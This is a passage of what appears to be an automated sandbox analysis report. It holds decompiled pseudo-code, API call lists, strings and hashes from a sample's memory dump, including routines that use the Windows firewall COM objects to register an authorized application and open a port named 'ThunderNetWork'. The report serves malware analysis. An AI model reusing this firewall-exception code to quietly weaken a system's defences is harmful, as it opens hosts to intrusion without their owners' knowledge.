				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				InterlockedIncrement( *(_t46 + 0x68));
				 *(_t47 - 4) = 0xfffffffe;
				E00B13312();
				E00B13C3D(_t35, 0xc);
				 *(_t47 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t47 + 0xc));
				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0xb1f618; // 0xb1f540
					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
				}
				E00B12EFA( *((intOrPtr*)(_t46 + 0x6c)));
				 *(_t47 - 4) = 0xfffffffe;
				return E00B13FB5(E00B1331B());
			}

0x00b1323d
0x00b1323d
0x00b1323f
0x00b13244
0x00b13249
0x00b1324f
0x00b13257
0x00b1325a
0x00b1325f
0x00b13260
0x00b13263
0x00b13266
0x00b13270
0x00b13275
0x00b1327d
0x00b13285
0x00b13295
0x00b13295
0x00b1329b
0x00b1329e
0x00b132a5
0x00b132ac
0x00b132b5
0x00b132bb
0x00b132c2
0x00b132c8
0x00b132cf
0x00b132d6
0x00b132dc
0x00b132df
0x00b132e2
0x00b132e7
0x00b132e9
0x00b132ee
0x00b132ee
0x00b132f4
0x00b132fa
0x00b1330b

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00B1DD18,0000000C,00B13378,00000000,00000000,?,00000000,?,00B190BC,00000000,00010000,00030000,?,00B184B4), ref: 00B1324F
__crt_waiting_on_module_handle.LIBCMT ref: 00B1325A

Part of subcall function 00B12003: Sleep.KERNEL32(000003E8,00000000,?,00B131A0,KERNEL32.DLL,?,00B131EC,?,00000000,?,00B190BC,00000000,00010000,00030000,?,00B184B4), ref: 00B1200F
Part of subcall function 00B12003: GetModuleHandleW.KERNEL32(00000000,?,00B131A0,KERNEL32.DLL,?,00B131EC,?,00000000,?,00B190BC,00000000,00010000,00030000,?,00B184B4), ref: 00B12018

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00B13283
GetProcAddress.KERNEL32(?,DecodePointer), ref: 00B13293
__lock.LIBCMT ref: 00B132B5
InterlockedIncrement.KERNEL32(?), ref: 00B132C2
__lock.LIBCMT ref: 00B132D6
___addlocaleref.LIBCMT ref: 00B132F4

Strings

EncodePointer, xrefs: 00B13277
DecodePointer, xrefs: 00B1328B
KERNEL32.DLL, xrefs: 00B13249, 00B1324E, 00B13259

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 7d0bf6bbf15e8cbbcef115986fa7ea9049d6f716f4b62a971efc86d00b7d8730
Instruction ID: 2482efe5ded69cb937ff894a914fc580524767b54e141fc3f3c95c4e9d327799
Opcode Fuzzy Hash: 7d0bf6bbf15e8cbbcef115986fa7ea9049d6f716f4b62a971efc86d00b7d8730
Instruction Fuzzy Hash: D611DF71944701DBD720EF79D805BDABBE0AF04714F908599E4A9A32A0DB74AA80CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00B11191, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 176
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00B11191(void* __eax, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t67;
				intOrPtr* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr _t80;
				intOrPtr* _t83;
				intOrPtr* _t85;
				char* _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				char* _t110;
				void* _t134;
				intOrPtr _t135;
				intOrPtr _t138;

				_t131 = __edx;
				_t134 = __eax;
				_v44 = 0;
				_t110 = 0x80004005;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v24 = E00B180F0(__edx, _a4);
				_t67 = E00B180F0(__edx, "ThunderNetWork");
				_v36 = _t67;
				_v28 = 0x100;
				__imp__#2(L"LAN");
				_v40 = _t67;
				E00B180F0(__edx, _a8);
				_v32 = 0;
				if(E00B11071(_t134,  &_v28,  &_v32) == 0) {
					_t135 = _v44;
				} else {
					_t80 = E00B180F0(_t131, E00B11C70(_t134, ":") + 1);
					_t138 = _t80;
					__imp__CoInitializeEx(0, 2);
					_t135 = _t80;
					if(_t135 == 0x80010106 || _t135 >= 0) {
						_t110 = E00B11058( &_v20,  &_v20);
						if(_t110 >= 0) {
							_t83 = _v20;
							_t110 =  *((intOrPtr*)( *_t83 + 0x48))(_t83,  &_v16);
							if(_t110 >= 0) {
								_t85 = _v20;
								_t110 =  *((intOrPtr*)( *_t85 + 0x1c))(_t85,  &_v12);
								if(_t110 >= 0) {
									if((_v12 & 0x00000004) != 0 && _v12 != 4) {
										_v12 = _v12 ^ 0x00000004;
									}
									_t87 =  &_v8;
									__imp__CoCreateInstance(0xb1db2c, 0, 1, 0xb1db3c, _t87);
									_t110 = _t87;
									if(_t110 >= 0) {
										_t88 = _v16;
										 *((intOrPtr*)( *_t88 + 0x24))(_t88, _v24);
										_t90 = _v8;
										 *((intOrPtr*)( *_t90 + 0x20))(_t90, _v24);
										_t92 = _v8;
										 *((intOrPtr*)( *_t92 + 0x28))(_t92, _v36);
										_t94 = _v8;
										 *((intOrPtr*)( *_t94 + 0x40))(_t94, _v28);
										_t96 = _v8;
										 *((intOrPtr*)( *_t96 + 0x98))(_t96, _v12);
										_t98 = _v8;
										 *((intOrPtr*)( *_t98 + 0xa8))(_t98, 1);
										_t100 = _v8;
										 *((intOrPtr*)( *_t100 + 0x88))(_t100, 0xffffffff);
										_t102 = _v8;
										 *((intOrPtr*)( *_t102 + 0x80))(_t102, _v40);
										_t104 = _v8;
										 *((intOrPtr*)( *_t104 + 0x48))(_t104, _t138);
										_t106 = _v8;
										 *((intOrPtr*)( *_t106 + 0x98))(_t106, 6);
										_t108 = _v16;
										_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v8);
									}
								}
							}
						}
					}
				}
				_t71 = _v8;
				if(_t71 != 0) {
					 *((intOrPtr*)( *_t71 + 8))(_t71);
				}
				_t72 = _v16;
				if(_t72 != 0) {
					 *((intOrPtr*)( *_t72 + 8))(_t72);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					 *((intOrPtr*)( *_t73 + 8))(_t73);
				}
				if(_t135 >= 0) {
					__imp__CoUninitialize();
				}
				return _t110;
			}

0x00b11191
0x00b1119f
0x00b111a1
0x00b111a4
0x00b111a9
0x00b111ac
0x00b111af
0x00b111b2
0x00b111bf
0x00b111c2
0x00b111cc
0x00b111cf
0x00b111d6
0x00b111df
0x00b111e2
0x00b111ea
0x00b111f9
0x00b11337
0x00b111ff
0x00b1120e
0x00b11217
0x00b11219
0x00b1121f
0x00b11227
0x00b1123a
0x00b1123f
0x00b11245
0x00b11252
0x00b11256
0x00b1125c
0x00b11269
0x00b1126d
0x00b11277
0x00b1127f
0x00b1127f
0x00b11283
0x00b11295
0x00b1129b
0x00b1129f
0x00b112a5
0x00b112ae
0x00b112b1
0x00b112ba
0x00b112bd
0x00b112c6
0x00b112c9
0x00b112d2
0x00b112d5
0x00b112de
0x00b112e4
0x00b112ec
0x00b112f2
0x00b112fa
0x00b11300
0x00b11309
0x00b1130f
0x00b11316
0x00b11319
0x00b11321
0x00b11327
0x00b11333
0x00b11333
0x00b1129f
0x00b1126d
0x00b11256
0x00b1123f
0x00b11227
0x00b1133a
0x00b1133f
0x00b11344
0x00b11344
0x00b11347
0x00b1134c
0x00b11351
0x00b11351
0x00b11354
0x00b11359
0x00b1135e
0x00b1135e
0x00b11363
0x00b11365
0x00b11365
0x00b11371

APIs

_com_util::ConvertStringToBSTR.COMSUPP ref: 00B111B5
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B111C2

Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221

SysAllocString.OLEAUT32(LAN), ref: 00B111D6
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B111E2

Part of subcall function 00B180F0: _malloc.LIBCMT ref: 00B181A1

Part of subcall function 00B11071: __wcstoui64.LIBCMT ref: 00B110DB

_com_util::ConvertStringToBSTR.COMSUPP ref: 00B1120E
CoInitializeEx.OLE32(00000000,00000002,00000001,?), ref: 00B11219
CoCreateInstance.OLE32(00B1DB2C,00000000,00000001,00B1DB3C,?), ref: 00B11295
CoUninitialize.OLE32(?), ref: 00B11365

Strings

LAN, xrefs: 00B111C7
ThunderNetWork, xrefs: 00B111BA

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$AllocByteCharErrorLastMultiWide$CreateInitializeInstanceUninitialize__wcstoui64_malloclstrlen
String ID: LAN$ThunderNetWork
API String ID: 1199507461-1899760959
Opcode ID: 4370160322aefcf033959a3cd18533cc0f664b64615e718a9639c0334bdf0c73
Instruction ID: c2fb4933427d86bac9c95999c641ab8b53d954864c1cb798b08ca4e98d48b3de
Opcode Fuzzy Hash: 4370160322aefcf033959a3cd18533cc0f664b64615e718a9639c0334bdf0c73
Instruction Fuzzy Hash: F961FC75A00209AFCB00DFE4C888ADE7BF9FF49714F504498F915EB251DB759A82CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00B11567, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117
comCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00B11567(char* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t38;
				char* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;
				intOrPtr* _t43;
				char* _t51;
				intOrPtr* _t52;
				char* _t53;
				intOrPtr* _t54;
				char* _t55;
				char* _t58;
				intOrPtr* _t59;
				char* _t60;
				intOrPtr* _t75;
				signed int _t78;

				_t74 = __edx;
				_t34 =  *0xb1f008; // 0x101c184a
				_v12 = _t34 ^ _t78;
				_v48 = _a4;
				__imp__CoInitialize(0);
				_v44 = 0;
				_v36 = 0;
				_v40 = 0;
				_v32 = 0;
				_t38 = E00B180F0(__edx, "HNetCfg.FwMgr");
				_t75 = __imp__CLSIDFromProgID;
				_t39 =  *_t75(_t38,  &_v28);
				_t76 = _t39;
				if(_t39 == 0) {
					_t51 =  &_v28;
					__imp__CoCreateInstance(_t51, 0, 5, 0xb1c17c,  &_v44);
					_t76 = _t51;
					if(_t51 >= 0) {
						_t52 = _v44;
						_t74 =  &_v36;
						_t53 =  *((intOrPtr*)( *_t52 + 0x1c))(_t52,  &_v36);
						_t76 = _t53;
						if(_t53 >= 0) {
							_t54 = _v36;
							_t74 =  &_v40;
							_t55 =  *((intOrPtr*)( *_t54 + 0x1c))(_t54,  &_v40);
							_t76 = _t55;
							if(_t55 >= 0) {
								_t58 =  *_t75(E00B180F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
								_t76 = _t58;
								if(_t58 >= 0) {
									_t59 = _v40;
									_t74 =  &_v32;
									_t60 =  *((intOrPtr*)( *_t59 + 0x50))(_t59,  &_v32);
									_t76 = _t60;
									if(_t60 >= 0) {
										_t76 =  *((intOrPtr*)( *_v32 + 0x24))(_v32, E00B180F0( &_v32, _v48));
									}
								}
							}
						}
					}
				}
				_t40 = _v32;
				if(_t40 != 0) {
					 *((intOrPtr*)( *_t40 + 8))(_t40);
				}
				_t41 = _v40;
				if(_t41 != 0) {
					 *((intOrPtr*)( *_t41 + 8))(_t41);
				}
				_t42 = _v36;
				if(_t42 != 0) {
					 *((intOrPtr*)( *_t42 + 8))(_t42);
				}
				_t43 = _v44;
				if(_t43 != 0) {
					 *((intOrPtr*)( *_t43 + 8))(_t43);
				}
				__imp__CoUninitialize();
				return E00B11C57(_t76, 0, _v12 ^ _t78, _t74, _t75, _t76);
			}

0x00b11567
0x00b1156d
0x00b11574
0x00b11580
0x00b11583
0x00b11592
0x00b11595
0x00b11598
0x00b1159b
0x00b1159e
0x00b115a3
0x00b115aa
0x00b115ac
0x00b115b0
0x00b115c2
0x00b115c6
0x00b115cc
0x00b115d0
0x00b115d2
0x00b115d7
0x00b115dc
0x00b115df
0x00b115e3
0x00b115e5
0x00b115ea
0x00b115ef
0x00b115f2
0x00b115f6
0x00b11607
0x00b11609
0x00b1160d
0x00b1160f
0x00b11614
0x00b11619
0x00b1161c
0x00b11620
0x00b11636
0x00b11636
0x00b11620
0x00b1160d
0x00b115f6
0x00b115e3
0x00b115d0
0x00b11638
0x00b1163d
0x00b11642
0x00b11642
0x00b11645
0x00b1164a
0x00b1164f
0x00b1164f
0x00b11652
0x00b11657
0x00b1165c
0x00b1165c
0x00b1165f
0x00b11664
0x00b11669
0x00b11669
0x00b1166c
0x00b11682

APIs

CoInitialize.OLE32(00000000), ref: 00B11583
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B1159E
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00B115AA
CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B115C6
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B11601

Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00B11607
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B1162A

Part of subcall function 00B180F0: _malloc.LIBCMT ref: 00B181A1

CoUninitialize.OLE32 ref: 00B1166C

Strings

HNetCfg.FwMgr, xrefs: 00B1158D
HNetCfg.FwAuthorizedApplication, xrefs: 00B115FC

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharErrorFromLastMultiProgWide$AllocCreateInitializeInstanceUninitialize_malloclstrlen
String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
API String ID: 4188526640-1951265404
Opcode ID: 0112a7aebc83a517460b97378800b72926f5a5bfa43f355321a74633caa8173b
Instruction ID: 29d69cc66cc2351cd21a5b1a8ec276b6e6e2860b5c4bef8f41acdc69e3a2a429
Opcode Fuzzy Hash: 0112a7aebc83a517460b97378800b72926f5a5bfa43f355321a74633caa8173b
Instruction Fuzzy Hash: CA41F471D402199FCB10EFA8C8888EDB7F9FF4D310B9449A9E605F7251DA359D85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B11683, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127
comCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00B11683(char* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				void* _t43;
				char* _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t48;
				char* _t56;
				intOrPtr* _t57;
				char* _t58;
				intOrPtr* _t59;
				char* _t60;
				char* _t63;
				intOrPtr* _t64;
				char* _t65;
				intOrPtr* _t68;
				char _t83;
				signed int _t86;

				_t82 = __edx;
				_t39 =  *0xb1f008; // 0x101c184a
				_v12 = _t39 ^ _t86;
				_t83 = 0;
				_v56 = _a4;
				__imp__CoInitialize(0);
				_v32 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_t43 = E00B180F0(__edx, "HNetCfg.FwMgr");
				_t85 = __imp__CLSIDFromProgID;
				_t44 =  *_t85(_t43,  &_v28);
				_t70 = _t44;
				if(_t44 == 0) {
					_t56 =  &_v28;
					__imp__CoCreateInstance(_t56, 0, 5, 0xb1c17c,  &_v32);
					_t70 = _t56;
					if(_t56 >= 0) {
						_t57 = _v32;
						_t82 =  &_v44;
						_t58 =  *((intOrPtr*)( *_t57 + 0x1c))(_t57,  &_v44);
						_t70 = _t58;
						if(_t58 >= 0) {
							_t59 = _v44;
							_t82 =  &_v40;
							_t60 =  *((intOrPtr*)( *_t59 + 0x1c))(_t59,  &_v40);
							_t70 = _t60;
							if(_t60 >= 0) {
								_t63 =  *_t85(E00B180F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
								_t70 = _t63;
								if(_t63 >= 0) {
									_t64 = _v40;
									_t82 =  &_v36;
									_t65 =  *((intOrPtr*)( *_t64 + 0x48))(_t64,  &_v36);
									_t70 = _t65;
									if(_t65 >= 0) {
										_v52 = 0;
										_t85 =  &_v48;
										_v48 = 0x100;
										if(E00B11071(_v56,  &_v48,  &_v52) != 0) {
											_t68 = _v36;
											_t70 =  *((intOrPtr*)( *_t68 + 0x24))(_t68, _v52, _v48);
										}
										_t83 = 0;
									}
								}
							}
						}
					}
				}
				_t45 = _v36;
				if(_t45 != _t83) {
					 *((intOrPtr*)( *_t45 + 8))(_t45);
				}
				_t46 = _v40;
				if(_t46 != _t83) {
					 *((intOrPtr*)( *_t46 + 8))(_t46);
				}
				_t47 = _v44;
				if(_t47 != _t83) {
					 *((intOrPtr*)( *_t47 + 8))(_t47);
				}
				_t48 = _v32;
				if(_t48 != _t83) {
					 *((intOrPtr*)( *_t48 + 8))(_t48);
				}
				__imp__CoUninitialize();
				return E00B11C57(_t70, _t70, _v12 ^ _t86, _t82, _t83, _t85);
			}

0x00b11683
0x00b11689
0x00b11690
0x00b11699
0x00b1169c
0x00b1169f
0x00b116ae
0x00b116b1
0x00b116b4
0x00b116b7
0x00b116ba
0x00b116bf
0x00b116c6
0x00b116c8
0x00b116cc
0x00b116de
0x00b116e2
0x00b116e8
0x00b116ec
0x00b116f2
0x00b116f7
0x00b116fc
0x00b116ff
0x00b11703
0x00b11705
0x00b1170a
0x00b1170f
0x00b11712
0x00b11716
0x00b11727
0x00b11729
0x00b1172d
0x00b1172f
0x00b11734
0x00b11739
0x00b1173c
0x00b11740
0x00b11745
0x00b1174c
0x00b1174f
0x00b1175e
0x00b11763
0x00b1176f
0x00b1176f
0x00b11771
0x00b11771
0x00b11740
0x00b1172d
0x00b11716
0x00b11703
0x00b116ec
0x00b11773
0x00b11778
0x00b1177d
0x00b1177d
0x00b11780
0x00b11785
0x00b1178a
0x00b1178a
0x00b1178d
0x00b11792
0x00b11797
0x00b11797
0x00b1179a
0x00b1179f
0x00b117a4
0x00b117a4
0x00b117a7
0x00b117bd

APIs

CoInitialize.OLE32(00000000), ref: 00B1169F
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B116BA
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00B116C6
CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B116E2
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B11721

Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00B11727

Part of subcall function 00B11071: __wcstoui64.LIBCMT ref: 00B110DB

CoUninitialize.OLE32 ref: 00B117A7

Strings

HNetCfg.FwMgr, xrefs: 00B116A9
HNetCfg.FwAuthorizedApplication, xrefs: 00B1171C

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharConvertErrorFromLastMultiProgWide_com_util::$AllocCreateInitializeInstanceUninitialize__wcstoui64lstrlen
String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
API String ID: 1827900861-1951265404
Opcode ID: efbc8f0cc044cc3df26d0c55e9e3c12a5203f13a7318387cf548b63c1f59614c
Instruction ID: 716c83a085c1eeec31cd9cead8cba1fda2d0c3fddfe1773a499882be2933f0ab
Opcode Fuzzy Hash: efbc8f0cc044cc3df26d0c55e9e3c12a5203f13a7318387cf548b63c1f59614c
Instruction Fuzzy Hash: AA41D0B5A00218AFCB00DFE8C8898EEBBF9EF8D710B644895E501E7351DB759C81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B128F4, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00B128F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xb1dcb8);
				E00B13F70(__ebx, __edi, __esi);
				_t31 = E00B1339D(__ebx, __edi, _t35);
				_t15 =  *0xb1f534; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00B13C3D(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xb1f438; // 0x2201660
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0xb1f010;
								if(__eflags != 0) {
									_push(_t33);
									E00B154A0(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0xb1f438; // 0x2201660
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xb1f438; // 0x2201660
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00B1298F();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00B12033(_t29, _t31, 0x20);
				}
				return E00B13FB5(_t33);
			}

0x00b128f4
0x00b128f4
0x00b128f4
0x00b128f4
0x00b128f6
0x00b128fb
0x00b12905
0x00b12907
0x00b1290f
0x00b12930
0x00b12936
0x00b1293a
0x00b1293d
0x00b12940
0x00b12946
0x00b12948
0x00b1294a
0x00b1294d
0x00b12953
0x00b12955
0x00b12957
0x00b1295d
0x00b1295f
0x00b12960
0x00b12965
0x00b1295d
0x00b12955
0x00b12966
0x00b1296b
0x00b1296e
0x00b12974
0x00b12978
0x00b12978
0x00b1297e
0x00b12985
0x00b12917
0x00b12917
0x00b12917
0x00b1291c
0x00b12920
0x00b12925
0x00b1292d

APIs

__getptd.LIBCMT ref: 00B12900

Part of subcall function 00B1339D: __getptd_noexit.LIBCMT ref: 00B133A0
Part of subcall function 00B1339D: __amsg_exit.LIBCMT ref: 00B133AD

__amsg_exit.LIBCMT ref: 00B12920
__lock.LIBCMT ref: 00B12930
InterlockedDecrement.KERNEL32(?), ref: 00B1294D
InterlockedIncrement.KERNEL32(02201660), ref: 00B12978

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: a1e4418a6413751fe3c642c549d7a948427c2b63f0da28214a475c296a3b0943
Instruction ID: 670cccf0d5df41d64aae83a9ba2d5aa357154b10e0ad5a692607fb388fdd5bd8
Opcode Fuzzy Hash: a1e4418a6413751fe3c642c549d7a948427c2b63f0da28214a475c296a3b0943
Instruction Fuzzy Hash: 92016132D01622DBD721AF5894497DEB7E0FF04BA0FC441A5E45477294CB386AD1CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00B154A0, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00B154A0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0xb1de48);
				_t8 = E00B13F70(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E00B13FB5(_t8);
				}
				if( *0xb20a98 != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0xb2093c, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E00B138CA(_t32);
						 *_t10 = E00B13888(GetLastError());
					}
					goto L9;
				}
				E00B13C3D(__ebx, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00B16520(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00B16550();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E00B154F6();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}

0x00b154a0
0x00b154a2
0x00b154a7
0x00b154ac
0x00b154b1
0x00b15528
0x00b1552d
0x00b1552d
0x00b154ba
0x00b154ff
0x00b15500
0x00b15508
0x00b1550e
0x00b15510
0x00b15512
0x00b15525
0x00b15527
0x00000000
0x00b15510
0x00b154be
0x00b154c4
0x00b154c9
0x00b154cf
0x00b154d4
0x00b154d6
0x00b154d7
0x00b154d8
0x00b154de
0x00b154df
0x00b154e6
